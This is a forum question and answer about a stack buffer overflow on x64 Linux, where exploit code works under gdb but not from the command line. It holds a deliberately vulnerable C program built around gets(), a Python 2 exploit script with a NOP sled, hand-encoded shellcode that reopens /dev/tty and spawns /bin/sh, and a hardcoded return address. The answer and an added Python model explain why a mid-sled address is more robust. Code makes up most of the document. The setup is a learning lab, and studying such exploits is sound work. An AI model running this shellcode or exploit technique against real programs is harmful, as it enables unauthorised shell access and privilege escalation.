
Shellcode injection on x64 linux

I'm facing a problem while trying to inject shellcode into a program through a buffer overflow on a 64-bit system. I already disabled ASLR and compiled without stack cookies and with execstack.

// vuln.c  (deliberately vulnerable target: gets() has no bounds check)
#include <stdio.h>

void vuln()
{
        printf("Give me something to worry about...\n");

        char buf[500];
        gets(buf);      // reads an unbounded line into a 500-byte stack buffer

        printf("No root shell for you...\n");
}

int main()
{
    vuln();
    return 0;
}

# exp.py  (Python 2: str is a byte string, so the "\x.." escapes are raw bytes)
from struct import pack

payload_len = 520           # bytes needed to reach and overwrite the saved return address
nop = "\x90"*300            # NOP sled
# Address in the middle of the nop stack
rip = 0x7fffffffdf4c

buf = ""
# close(0)
buf += "\x48\x31\xc0\x50\x5f\xb0\x03\x0f\x05"
# open("/dev/tty", ...) -> reuses fd 0, so the shell reads from the terminal
buf += "\x50\x48\xbf\x2f\x64\x65\x76\x2f\x74\x74\x79\x57\x54\x5f\x50\x5e\x66\xbe\x02\x27\xb0\x02\x0f\x05"
# execve("/bin//sh", ["/bin//sh", NULL], NULL)
buf += "\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x50\x57\x54\x5e\x48\x99\xb0\x3b\x0f\x05"

buf_len = len(buf)
nop_len = len(nop)
padding = "A"*(payload_len-nop_len-buf_len)

# layout: [NOP sled][shellcode][padding][saved RIP overwritten with rip]
payload = nop + buf + padding + pack("<Q", rip)

print payload

Basically the exploit only works while running in gdb (I'm able to start a shell) but not on the command line. I figured it could be because of a closed pipe, so I tried the cat trick by doing (python exp.py; cat) | ./vuln, but it didn't help. Obviously doing the exploit in gdb doesn't allow escalating privileges. Does someone know what I'm doing wrong?

Thanks in advance.

Apparently the address I got with gdb ( rip = 0x7fffffffdf4c ) was too close to the beginning of the buffer, and when executing from the command line execution was redirected to invalid memory (I guess the stack was shifted down slightly compared to executing under gdb). By choosing an address further down in the NOP slide everything works as expected.
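To make the answer's point concrete, here is an added example (not code from the question or the answer) that models the payload layout of exp.py and shows how far the buffer may move at runtime before a fixed return address no longer lands in the NOP sled. The buffer address used for gdb is a constructed assumption; only rip and the payload sizes come from the post.

```python
# Added example: why a return address near the start of the NOP sled is
# brittle. The gdb buffer address below is constructed for illustration.

NOP_LEN = 300          # len(nop) in exp.py
SHELLCODE_LEN = 57     # len(buf) in exp.py: 9 + 24 + 24 bytes
PAYLOAD_LEN = 520      # payload_len in exp.py


def landing_offset(rip, buf_start, delta=0):
    """Offset into the payload at which execution resumes after `ret`.

    buf_start is where the payload begins under gdb; delta is how far the
    buffer has moved at runtime (positive = higher address, negative = lower).
    """
    return rip - (buf_start + delta)


def region(offset):
    """Classify a landing offset against the layout nop|shellcode|padding|rip."""
    if offset < 0:
        return "before buffer"
    if offset < NOP_LEN:
        return "nop sled"
    if offset < NOP_LEN + SHELLCODE_LEN:
        return "mid-shellcode"
    return "padding/return address"


def tolerated_deltas(rip, buf_start):
    """Closed range of buffer moves for which rip still lands in the sled."""
    off = landing_offset(rip, buf_start)
    return (off - NOP_LEN + 1, off)


if __name__ == "__main__":
    rip = 0x7fffffffdf4c            # value from the question
    gdb_buf = 0x7fffffffdf30        # constructed: rip is only 28 bytes into the sled
    for delta in (0, 16, 32, -64):
        off = landing_offset(rip, gdb_buf, delta)
        print("buffer moved %+4d: offset %4d -> %s" % (delta, off, region(off)))
    print("sled-safe moves, rip near sled start:", tolerated_deltas(rip, gdb_buf))
    mid = gdb_buf + NOP_LEN // 2
    print("sled-safe moves, rip mid-sled:       ", tolerated_deltas(mid, gdb_buf))
```

With rip 28 bytes into the sled, any upward move of the buffer beyond 28 bytes lands before the buffer, whereas a mid-sled address tolerates roughly 150 bytes of movement in either direction.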
